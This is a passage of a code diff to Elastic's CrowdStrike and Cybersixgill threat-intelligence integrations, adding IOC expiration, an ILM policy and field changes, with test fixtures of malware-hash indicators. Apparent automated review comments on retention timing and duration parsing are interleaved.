@@ -143,6 +148,11 @@ An example event for `intel` looks as following: "threat": { "indicator": { "confidence": "High", + "file": { + "hash": { + "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" + } + }, "name": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d", "provider": "crowdstrike", "type": "file" @@ -265,7 +275,7 @@ An example event for `intel` looks as following: | ti_crowdstrike.intel.domain_types | Information related to domain types associated with the Intel Indicator. | keyword | | ti_crowdstrike.intel.expiration_duration | | keyword | | ti_crowdstrike.intel.id | A unique identifier for the Intel Indicator. | keyword | -| ti_crowdstrike.intel.ip_address_types | Information related to IP address types associated with the Intel Indicator. | ip | +| ti_crowdstrike.intel.ip_address_types | Information related to IP address types associated with the Intel Indicator. | keyword | | ti_crowdstrike.intel.kill_chains | Information related to kill chains associated with the Intel Indicator. | keyword | | ti_crowdstrike.intel.labels.created_on | Timestamp indicating when the labels were created. | date | | ti_crowdstrike.intel.labels.last_valid_on | Timestamp indicating when the labels were last valid. | date | @@ -299,11 +309,11 @@ An example event for `ioc` looks as following: { "@timestamp": "2023-11-01T10:22:23.106Z", "agent": { - "ephemeral_id": "1a68a49b-98f5-4aee-adf5-df243cdb4637", - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "ephemeral_id": "ca4c5a70-0aa1-4cb3-867c-3c099798eef4", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.0" }, "data_stream": { "dataset": "ti_crowdstrike.ioc", 
@@ -314,9 +324,9 @@ An example event for `ioc` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "snapshot": false, - "version": "8.11.0" + "version": "8.12.0" }, "event": { "action": "detect-again", @@ -326,7 +336,7 @@ An example event for `ioc` looks as following: ], "dataset": "ti_crowdstrike.ioc", "id": "34874a88935860cf6yyfc856d6abb6f35a29d8c077195ed6291aa8373696b44", - "ingested": "2024-01-11T11:54:47Z", + "ingested": "2024-03-28T10:50:10Z", "kind": "enrichment", "original": "{\"action\":\"detect again\",\"applied_globally\":true,\"created_by\":\"abc.it@example.com\",\"created_on\":\"2023-11-01T10:22:23.10607613Z\",\"deleted\":false,\"description\":\"IS-38887\",\"expired\":false,\"from_parent\":false,\"id\":\"34874a88935860cf6yyfc856d6abb6f35a29d8c077195ed6291aa8373696b44\",\"metadata\":{\"filename\":\"High_Serverity_Heuristic_Sandbox_Threat.docx\"},\"modified_by\":\"example.it@ex.com\",\"modified_on\":\"2023-11-01T10:22:23.10607613Z\",\"platforms\":[\"windows\",\"mac\",\"linux\"],\"severity\":\"critical\",\"tags\":[\"IS-38887\"],\"type\":\"ipv4\",\"value\":\"81.2.69.192\"}", "type": [ diff --git a/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/ecs.yml b/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/ecs.yml index f49d1f833b9..213b4dccd99 100644 --- a/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/ecs.yml +++ b/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/ecs.yml @@ -12,10 +12,6 @@ type: keyword - name: event.type type: keyword -- name: file.hash.md5 - type: keyword -- name: file.hash.sha256 - type: keyword - name: related.hash type: keyword - name: related.ip 
@@ -24,6 +20,12 @@ type: keyword - name: threat.indicator.confidence type: keyword +- name: threat.indicator.file.hash.md5 + type: keyword +- name: threat.indicator.file.hash.sha1 + type: keyword +- name: threat.indicator.file.hash.sha256 + type: keyword - name: threat.indicator.ip type: ip - name: threat.indicator.name @@ -32,5 +34,7 @@ type: keyword - name: threat.indicator.type type: keyword +- name: threat.indicator.url.full + type: keyword - name: vulnerability.category type: keyword diff --git a/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/fields.yml b/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/fields.yml index e7cc8b2e6aa..58d29ee64b6 100644 --- a/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/fields.yml +++ b/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/fields.yml @@ -22,7 +22,7 @@ type: keyword description: A unique identifier for the Intel Indicator. - name: ip_address_types - type: ip + type: keyword description: Information related to IP address types associated with the Intel Indicator. - name: kill_chains type: keyword diff --git a/packages/ti_crowdstrike/manifest.yml b/packages/ti_crowdstrike/manifest.yml index 6c404008d54..3579031ea78 100644 --- a/packages/ti_crowdstrike/manifest.yml +++ b/packages/ti_crowdstrike/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.3 name: ti_crowdstrike title: CrowdStrike Falcon Intelligence -version: 0.1.2 +version: 0.5.4 description: Collect logs from CrowdStrike Falcon Intelligence with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - threat_intel conditions: kibana: - version: ^8.11.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -49,6 +49,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: url type: text title: URL 
@@ -62,6 +63,7 @@ policy_templates: description: Token URL of CrowdStrike Falcon Intelligence. default: https://api.crowdstrike.com/oauth2/token required: true + secret: false show_user: false - name: proxy_url type: text diff --git a/packages/ti_cybersixgill/_dev/build/docs/README.md b/packages/ti_cybersixgill/_dev/build/docs/README.md index f49f11d1ba9..0b54853de5e 100644 --- a/packages/ti_cybersixgill/_dev/build/docs/README.md +++ b/packages/ti_cybersixgill/_dev/build/docs/README.md 
@@ -8,6 +8,12 @@ This integration connects with the commercial [Cybersixgill Darkfeed](https://ww The Cybersixgill Darkfeed integration collects threat intelligence from the Darkfeed TAXII service available using the credentials provided from Cybersixgill. +#### Expiration of Indicators of Compromise (IOCs) +The ingested IOCs are expired after the duration configured by `IOC Expiration Duration` integration setting. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to faciliate only active IOCs be available to the end users. This transform creates destination indices named `logs-ti_cybersixgill_latest.dest_threat-*` which only contains active and unexpired IOCs. The latest destination index also has an alias named `logs-ti_cybersixgill_latest.threat`. When querying for active indicators or setting up indicator match rules, only use the latest destination indices or the alias to avoid false positives from expired IOCs. Dashboards are also pointing to the latest destination indices containing active IOC. Please read [ILM Policy](#ilm-policy) below which is added to avoid unbounded growth on source datastream `.ds-logs-ti_cybersixgill.threat-*` indices. + +#### ILM Policy +To facilitate IOC expiration, source datastream-backed indices `.ds-logs-ti_cybersixgill.threat-*` are allowed to contain duplicates from each polling interval. ILM policy `logs-ti_cybersixgill.threat-default_policy` is added to these source indices so it doesn't lead to unbounded growth. This means data in these source indices will be deleted after `5 days` from ingested date. + {{fields "threat"}} {{event "threat"}} \ No newline at end of file diff --git a/packages/ti_cybersixgill/_dev/deploy/docker/files/config.yml b/packages/ti_cybersixgill/_dev/deploy/docker/files/config.yml index 32762a590d9..2bd3cc75a09 100644 --- a/packages/ti_cybersixgill/_dev/deploy/docker/files/config.yml 
+++ b/packages/ti_cybersixgill/_dev/deploy/docker/files/config.yml 
@@ -99,6 +99,51 @@ rules: "type": "indicator", "valid_from": "2021-12-07T22:43:29Z" }, + { + "confidence": 80, + "created": "2024-03-10T13:58:01.596Z", + "description": "Hash attributed to malware that was discovered in the dark and deep web", + "extensions": { + "extension-definition--3de9ff00-174d-4d41-87c9-05a27a7e117c": { + "extension_type": "toplevel-property-extension" + } + }, + "external_references": [ + { + "positive_rate": "medium", + "source_name": "VirusTotal", + "url": "https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f220" + }, + { + "description": "Mitre attack tactics and technique reference", + "mitre_attack_tactic": "Build Capabilities", + "mitre_attack_tactic_id": "TA0024", + "mitre_attack_tactic_url": "https://attack.mitre.org/tactics/TA0024/", + "source_name": "mitre-attack" + } + ], + "id": "indicator--302dab0f-64dc-42f5-b99e-702b28c1aaa0", + "indicator_types": [ + "malicious-activity" + ], + "lang": "en", + "modified": "2024-03-10T15:58:01.596Z", + "name": "4d0f21919d623bd1631ee15ca7429f20;5ce39ef0700b64bd0c71b55caf64ae45d8400960;7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f220", + "pattern": "[file:hashes.MD5 = '4d0f21919d623bd1631ee15ca7429f20' OR file:hashes.'SHA-1' = '5ce39ef0700b64bd0c71b55caf64ae45d8400960' OR file:hashes.'SHA-256' = '7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f220']", + "pattern_type": "stix", + "sixgill_actor": "vaedzy", + "sixgill_confidence": 80, + "sixgill_feedid": "darkfeed_012", + "sixgill_feedname": "dark_web_hashes", + "sixgill_post_virustotallink": "https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f220", + "sixgill_postid": "c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a", + "sixgill_posttitle": "[病毒样本] #Trickbot (2021-12-07)", + "sixgill_severity": 70, + "sixgill_source": "forum_kafan", + "spec_version": "2.1", + "type": "indicator", + "valid_from": "2024-03-07T02:55:17Z" + }, { "confidence": 70, 
"created": "2021-12-07T13:58:01.596Z", diff --git a/packages/ti_cybersixgill/changelog.yml b/packages/ti_cybersixgill/changelog.yml index 0e57435ece3..b06ea20fa41 100644 --- a/packages/ti_cybersixgill/changelog.yml +++ b/packages/ti_cybersixgill/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.27.0" + changes: + - description: Add support for IOC expiration. + type: enhancement + link: https://github.com/elastic/integrations/pull/9374 +- version: "1.26.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.25.1" changes: - description: Changed owners diff --git a/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-common-config.yml b/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-common-config.yml index 4da22641654..2c7449ef783 100644 --- a/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-common-config.yml +++ b/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-common-config.yml @@ -1,3 +1,5 @@ fields: tags: - preserve_original_event + _conf: + ioc_expiration_duration: 5d diff --git a/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-cybersixgill-ndjson.log-expected.json b/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-cybersixgill-ndjson.log-expected.json index 09ea0089d7b..3a6aeeb9b57 100644 --- a/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-cybersixgill-ndjson.log-expected.json +++ b/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-cybersixgill-ndjson.log-expected.json @@ -4,6 +4,8 @@ "@timestamp": "2021-12-07T09:22:41.485Z", "cybersixgill": { "actor": "layna61524", + "deleted_at": "2021-12-12T09:22:41.485Z", + "expiration_duration": "5d", "feedname": "darkweb_vt_links", "mitre": { "description": "Mitre attack tactics and technique reference" 
@@ -42,6 +44,7 @@ }, "first_seen": "2021-12-07T00:03:00.000Z", "last_seen": "2021-12-07T09:22:41.485Z", + "name": "2e7e43be1fc3cbefef8d686ce63ceb30456a4a67d555407fb6797e969972945c", "provider": "forum_bestblackhat", "reference": "https://portal.cybersixgill.com/#/search?q=_id:a452593da2f6314c2f2d6c98c6473608e11914e3", "type": "file" @@ -63,6 +66,8 @@ "@timestamp": "2021-12-07T18:04:26.451Z", "cybersixgill": { "actor": "CoinProject.info", + "deleted_at": "2021-12-12T18:04:26.451Z", + "expiration_duration": "5d", "feedname": "malware_download_urls", "mitre": { "description": "Mitre attack tactics and technique reference" @@ -91,6 +96,7 @@ "description": "Malware available for download from file-sharing sites", "first_seen": "2021-12-07T14:52:00.000Z", "last_seen": "2021-12-07T18:04:26.451Z", + "name": "https://ru.scribd.com/user/456422024/ForkLog#from_embed", "provider": "forum_hyipinvest", "reference": "https://portal.cybersixgill.com/#/search?q=_id:3f8c56e4cf6407ee7608e0f605503cb1e3fcedb9", "type": "url", @@ -119,6 +125,8 @@ "@timestamp": "2021-12-07T21:24:50.350Z", "cybersixgill": { "actor": "Admin", + "deleted_at": "2021-12-12T21:24:50.350Z", + "expiration_duration": "5d", "feedname": "dark_web_hashes", "mitre": { "description": "Mitre attack tactics and technique reference" @@ -152,6 +160,7 @@ }, "first_seen": "2021-12-07T21:23:33.000Z", "last_seen": "2021-12-07T21:24:50.350Z", + "name": "1dce6f3ba4a8d355df21a17584c514697ee0c37b51ab5657bc5b3a297b65955f", "provider": "blog_hackdig", "reference": "https://portal.cybersixgill.com/#/search?q=_id:c550f74ba76c0b2c9c46b0577f551ba5ef855813", "type": "file" @@ -173,6 +182,8 @@ "@timestamp": "2021-12-07T22:48:59.141Z", "cybersixgill": { "actor": "enginewo", + "deleted_at": "2021-12-12T22:48:59.141Z", + "expiration_duration": "5d", "feedname": "compromised_sites", "mitre": { "description": "Mitre attack tactics and technique reference" 
@@ -201,6 +212,7 @@ "description": "Shell access to this domain is being sold on dark web markets", "first_seen": "2021-12-07T22:43:29.000Z", "last_seen": "2021-12-07T22:48:59.141Z", + "name": "sdbpibandung.sch.id", "provider": "market_magbo", "reference": "https://portal.cybersixgill.com/#/search?q=_id:955f5379c2828ce483b74a671e498a5f69f9ea36", "type": "domain-name", diff --git a/packages/ti_cybersixgill/data_stream/threat/_dev/test/system/test-httpjson-config.yml b/packages/ti_cybersixgill/data_stream/threat/_dev/test/system/test-httpjson-config.yml index 3838cb93d9a..e8cf3d861b4 100644 --- a/packages/ti_cybersixgill/data_stream/threat/_dev/test/system/test-httpjson-config.yml +++ b/packages/ti_cybersixgill/data_stream/threat/_dev/test/system/test-httpjson-config.yml @@ -9,3 +9,6 @@ data_stream: url: http://{{Hostname}}:{{Port}}/taxii/sixgill-taxii/collections/102/objects interval: 30s enable_request_tracer: true + ioc_expiration_duration: 10d +assert: + hit_count: 4 diff --git a/packages/ti_cybersixgill/data_stream/threat/agent/stream/httpjson.yml.hbs b/packages/ti_cybersixgill/data_stream/threat/agent/stream/httpjson.yml.hbs index 2bea32e7bbb..96dc6124174 100644 --- a/packages/ti_cybersixgill/data_stream/threat/agent/stream/httpjson.yml.hbs +++ b/packages/ti_cybersixgill/data_stream/threat/agent/stream/httpjson.yml.hbs @@ -50,6 +50,13 @@ cursor: timestamp: value: '[[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]]' +{{#if ioc_expiration_duration}} +fields_under_root: true +fields: + _conf: + ioc_expiration_duration: "{{ioc_expiration_duration}}" +{{/if}} + tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ilm/default_policy.json b/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..ec3f7c9942e --- /dev/null +++ b/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ilm/default_policy.json 
@@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "hot": { + "actions": { + "rollover": { + "max_age": "1d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + }, + "delete": { + "min_age": "4d", + "actions": { + "delete": {} + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ingest_pipeline/default.yml b/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ingest_pipeline/default.yml index b8efd57a20f..585d4e80769 100644 --- a/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ingest_pipeline/default.yml @@ -27,11 +27,6 @@ processors: ignore_missing: true - drop: if: ctx?.cybersixgill?.type != "indicator" - - fingerprint: - fields: - - cybersixgill.id - target_field: "_id" - ignore_missing: true ##################### # Threat ECS Fields # ##################### @@ -74,6 +69,13 @@ processors: - "yyyy-MM-dd'T'HH:mm:ss.SSSz" - "yyyy-MM-dd'T'HH:mm:ss.SSSZ" if: "ctx.cybersixgill?.valid_from != null" + - fingerprint: + fields: + - cybersixgill.id + - cybersixgill.created + - cybersixgill.modified + target_field: "_id" + ignore_missing: true - grok: field: cybersixgill.pattern patterns: @@ -106,6 +108,22 @@ processors: value: "{{_ingest._value}}" override: false ignore_missing: true + - set: + field: threat.indicator.name + value: '{{_temp_.threatvalue}}' + ignore_empty_value: true + - set: + field: threat.indicator.name + copy_from: threat.indicator.file.hash.md5 + ignore_empty_value: true + - set: + field: threat.indicator.name + copy_from: threat.indicator.file.hash.sha1 + ignore_empty_value: true + - set: + field: threat.indicator.name + copy_from: threat.indicator.file.hash.sha256 + ignore_empty_value: true - rename: field: _temp_.threatvalue target_field: threat.indicator.ip 
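Review bot: The delete phase's `min_age: 4d` is counted from rollover, not from ingestion, so a source document lives anywhere between 4 and 5 days depending on whether `max_age: 1d` or `max_size: 50gb` triggers the rollover first; both READMEs and `lifecycle.yml` (`data_retention: "5d"`) in this same change describe a flat 5 days. If the intent is "at least 5 days in the source index", the policy needs `"min_age": "5d"` (yielding 5–6 days); otherwise the prose should say 4–5 days. JSON cannot carry a comment, so the rollover-relative semantics are best recorded next to the 5-day figure in the data stream README.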
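Review bot: The new `fingerprint` for `_id` now mixes `cybersixgill.id` with `cybersixgill.created` and `cybersixgill.modified`, which changes what "the same document" means: an indicator re-delivered with a new `modified` becomes a second document rather than an in-place overwrite, while byte-identical re-polls still collapse within one backing index. That reasoning is not visible at the processor and the earlier id-only fingerprint was just removed in the hunk above, so a reader may think the move was accidental; add above the processor `# _id covers id+created+modified: a modified indicator is a new document (the latest transform keeps the newest), unchanged re-polls still dedupe within a backing index`. Whether the transform indeed selects the newest version is inferred from the README text in this change, not from the transform definition, which is outside this diff.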
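Review bot: The four consecutive `set` processors on `threat.indicator.name` only work because `set` defaults to `override: true`, so the winner is the last non-empty source in list order: raw value, then md5, sha1, sha256 — i.e. sha256 for file indicators, which is what `sample_event.json` in this change shows. That precedence is invisible from the processors themselves and is easy to break by reordering. Add `# Display name: prefer the strongest available hash (sha256 > sha1 > md5), else the raw indicator value; order matters because each set overrides the previous` above the first of the four.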
@@ -168,6 +186,59 @@ processors: type: integer target_field: threat.indicator.confidence ignore_missing: true + - script: + lang: painless + tag: script-default-deleted_at + if: ctx.cybersixgill?.deleted_at == null && ctx._conf?.ioc_expiration_duration != null && ctx._conf.ioc_expiration_duration != '' + description: Indicator Expiration is done after `_conf.ioc_expiration_duration` (default 90d) since its creation time. This script adds a default `cybersixgill.indicator.deleted_at` field to allow indicator expiration. + source: > + def dur = ctx._conf.ioc_expiration_duration; + ZonedDateTime _tmp_deleted_at; + ZonedDateTime _tmp_created_at = ZonedDateTime.parse(ctx.cybersixgill.created); + if (dur instanceof String){ + String time_unit = dur.substring(dur.length() - 1, dur.length()); + String time_value = dur.substring(0, dur.length() - 1); + if (time_unit == 'd') { + _tmp_deleted_at = _tmp_created_at.plusDays(Long.parseLong(time_value)); + } else if (time_unit == 'h') { + _tmp_deleted_at = _tmp_created_at.plusHours(Long.parseLong(time_value)); + } else if (time_unit == 'm') { + _tmp_deleted_at = _tmp_created_at.plusMinutes(Long.parseLong(time_value)); + } else { + _tmp_deleted_at = _tmp_created_at.plusDays(90L); + if (ctx.error == null) { + ctx.error = new HashMap(); + } + if (ctx.error.message == null) { + ctx.error.message = new ArrayList(); + } + ctx.error.message.add('invalid ioc_expiration_duration: using default 90 days'); + } + ctx.cybersixgill.deleted_at = _tmp_deleted_at; + } + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: cybersixgill.deleted_at + tag: date_deleted_at + target_field: cybersixgill.deleted_at + formats: + - ISO8601 + - UNIX + on_failure: + - append: + field: error.message + value: 'Processor 
{{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - fail: + description: 'If this date processor fails, it leads to transform errors, hence failing the document for investigation.' + message: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed' + - rename: + field: _conf.ioc_expiration_duration + tag: rename_conf_ioc_expiration_duration + target_field: cybersixgill.expiration_duration + ignore_missing: true - script: lang: painless if: ctx.cybersixgill?.external_references != null @@ -280,6 +351,7 @@ processors: - cybersixgill.sixgill_feedid - cybersixgill.sixgill_post_virustotallink - cybersixgill.type + - _conf ignore_missing: true on_failure: - set: diff --git a/packages/ti_cybersixgill/data_stream/threat/fields/ecs.yml b/packages/ti_cybersixgill/data_stream/threat/fields/ecs.yml index 7e4da707181..022139ab678 100644 --- a/packages/ti_cybersixgill/data_stream/threat/fields/ecs.yml +++ b/packages/ti_cybersixgill/data_stream/threat/fields/ecs.yml @@ -60,3 +60,10 @@ name: threat.tactic.id - external: ecs name: threat.tactic.reference +# Manually define this as a workaround for failing tests and validation +- name: threat.indicator.name + level: extended + type: keyword + description: The display name indicator in an UI friendly format +- external: ecs + name: labels diff --git a/packages/ti_cybersixgill/data_stream/threat/fields/fields.yml b/packages/ti_cybersixgill/data_stream/threat/fields/fields.yml index d61ac6c9e9f..15a570d3c31 100644 --- a/packages/ti_cybersixgill/data_stream/threat/fields/fields.yml +++ b/packages/ti_cybersixgill/data_stream/threat/fields/fields.yml 
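Review bot: A non-numeric count such as `xd` is not covered by the script's fallback: the unit check passes, `Long.parseLong(time_value)` throws, the script's `on_failure` only appends to `error.message`, `cybersixgill.deleted_at` is never set, and the following `date_deleted_at` processor then hits its `fail` step — so a typo in the integration setting rejects every document instead of applying the 90-day default that an unknown unit gets. A negative count (`-5d`) parses fine and places `deleted_at` before `created`, expiring the indicator immediately. The `description` also names `cybersixgill.indicator.deleted_at` while the code sets `cybersixgill.deleted_at`. The `processors` list continues outside this hunk; the rewritten script below parses the count defensively and funnels every malformed value through the single default branch.

```yaml
  - script:
      lang: painless
      tag: script-default-deleted_at
      if: ctx.cybersixgill?.deleted_at == null && ctx._conf?.ioc_expiration_duration != null && ctx._conf.ioc_expiration_duration != ''
      description: Indicator expiration is done after `_conf.ioc_expiration_duration` (default 90d) since its creation time. Sets `cybersixgill.deleted_at`; accepts a positive integer followed by d, h or m, anything else falls back to 90 days and records an error.message.
      source: >
        def dur = ctx._conf.ioc_expiration_duration;
        ZonedDateTime _tmp_created_at = ZonedDateTime.parse(ctx.cybersixgill.created);
        ZonedDateTime _tmp_deleted_at = null;
        if (dur instanceof String && dur.length() > 1) {
          String time_unit = dur.substring(dur.length() - 1, dur.length());
          long time_value = -1L;
          try {
            time_value = Long.parseLong(dur.substring(0, dur.length() - 1));
          } catch (NumberFormatException e) {
            time_value = -1L;
          }
          if (time_value > 0 && time_unit == 'd') {
            _tmp_deleted_at = _tmp_created_at.plusDays(time_value);
          } else if (time_value > 0 && time_unit == 'h') {
            _tmp_deleted_at = _tmp_created_at.plusHours(time_value);
          } else if (time_value > 0 && time_unit == 'm') {
            _tmp_deleted_at = _tmp_created_at.plusMinutes(time_value);
          }
        }
        if (_tmp_deleted_at == null) {
          _tmp_deleted_at = _tmp_created_at.plusDays(90L);
          /* … unchanged: append 'invalid ioc_expiration_duration: using default 90 days' to ctx.error.message … */
        }
        ctx.cybersixgill.deleted_at = _tmp_deleted_at;
      # … unchanged: on_failure handler …
```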
@@ -29,3 +29,15 @@ type: keyword description: | The mitre description of the indicator + - name: deleted_at + type: date + description: | + The timestamp when indicator is (or will be) expired. + - name: expiration_duration + type: keyword + description: | + The configured expiration duration. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: "true" + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_cybersixgill/data_stream/threat/lifecycle.yml b/packages/ti_cybersixgill/data_stream/threat/lifecycle.yml new file mode 100644 index 00000000000..5a4af9095b7 --- /dev/null +++ b/packages/ti_cybersixgill/data_stream/threat/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "5d" diff --git a/packages/ti_cybersixgill/data_stream/threat/manifest.yml b/packages/ti_cybersixgill/data_stream/threat/manifest.yml index 58475a0f7a0..d1ebca62766 100644 --- a/packages/ti_cybersixgill/data_stream/threat/manifest.yml +++ b/packages/ti_cybersixgill/data_stream/threat/manifest.yml @@ -1,5 +1,6 @@ type: logs title: Cybersixgill Darkfeed Logs +ilm_policy: logs-ti_cybersixgill.threat-default_policy streams: - input: httpjson vars: @@ -15,6 +16,7 @@ streams: multi: false required: true show_user: true + secret: true - name: enable_request_tracer type: bool title: Enable request tracing 
@@ -44,6 +46,15 @@ streams: required: false show_user: false description: URL to proxy connections in the form of http\[s\]://:@: + - name: ioc_expiration_duration + type: text + title: IOC Expiration Duration + multi: false + required: true + show_user: true + default: "90d" + description: >- + Enforces all IOCs to expire after this duration since their creation time indicated in the feed. Use [Elasticsearch time units](https://www.elastic.co/guide/en/elasticsearch/reference/current/api-conventions.html#time-units) in days, hours, or minutes (e.g 10d) - name: interval type: text title: Interval diff --git a/packages/ti_cybersixgill/data_stream/threat/sample_event.json b/packages/ti_cybersixgill/data_stream/threat/sample_event.json index 9cd03108cb0..22ee5bf764f 100644 --- a/packages/ti_cybersixgill/data_stream/threat/sample_event.json +++ b/packages/ti_cybersixgill/data_stream/threat/sample_event.json @@ -1,14 +1,16 @@ { "@timestamp": "2021-12-07T13:58:01.596Z", "agent": { - "ephemeral_id": "a7e7cf45-534a-4104-b3c3-9b30d6ebeeb9", - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "ephemeral_id": "5b99e697-c059-40e4-9097-eb5a21a371c6", + "id": "49b0da18-7d53-4b44-9bda-940341f4fb0f", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.1" + "version": "8.12.1" }, "cybersixgill": { "actor": "vaedzy", + "deleted_at": "2021-12-17T13:58:01.596Z", + "expiration_duration": "10d", "feedname": "dark_web_hashes", "mitre": { "description": "Mitre attack tactics and technique reference" 
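Review bot: The `ioc_expiration_duration` description sends users to the full Elasticsearch time-unit list, but the ingest pipeline in this same change only understands a single integer followed by lower-case `d`, `h` or `m`; `1w`, `30s` or `10D` are silently replaced by 90 days with nothing more than an `error.message` entry, and the manifest offers no validation of its own. Narrow the description so the UI matches the parser: `Expiration as an integer followed by d (days), h (hours) or m (minutes), e.g. 10d, counted from the indicator's creation time in the feed; any other form falls back to 90d.`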
@@ -28,18 +30,18 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "id": "49b0da18-7d53-4b44-9bda-940341f4fb0f", "snapshot": false, - "version": "8.9.1" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-08-28T14:48:23.885Z", + "created": "2024-03-15T19:20:27.045Z", "dataset": "ti_cybersixgill.threat", - "ingested": "2023-08-28T14:48:24Z", + "ingested": "2024-03-15T19:20:27Z", "kind": "enrichment", "original": "{\"confidence\":70,\"created\":\"2021-12-07T13:58:01.596Z\",\"description\":\"Hash attributed to malware that was discovered in the dark and deep web\",\"extensions\":{\"extension-definition--3de9ff00-174d-4d41-87c9-05a27a7e117c\":{\"extension_type\":\"toplevel-property-extension\"}},\"external_references\":[{\"positive_rate\":\"medium\",\"source_name\":\"VirusTotal\",\"url\":\"https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\"},{\"description\":\"Mitre attack tactics and technique reference\",\"mitre_attack_tactic\":\"Build Capabilities\",\"mitre_attack_tactic_id\":\"TA0024\",\"mitre_attack_tactic_url\":\"https://attack.mitre.org/tactics/TA0024/\",\"source_name\":\"mitre-attack\"}],\"id\":\"indicator--302dab0f-64dc-42f5-b99e-702b28c1aaa9\",\"indicator_types\":[\"malicious-activity\"],\"lang\":\"en\",\"modified\":\"2021-12-07T13:58:01.596Z\",\"name\":\"4d0f21919d623bd1631ee15ca7429f28;5ce39ef0700b64bd0c71b55caf64ae45d8400965;7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\",\"pattern\":\"[file:hashes.MD5 = '4d0f21919d623bd1631ee15ca7429f28' OR file:hashes.'SHA-1' = '5ce39ef0700b64bd0c71b55caf64ae45d8400965' OR file:hashes.'SHA-256' = 
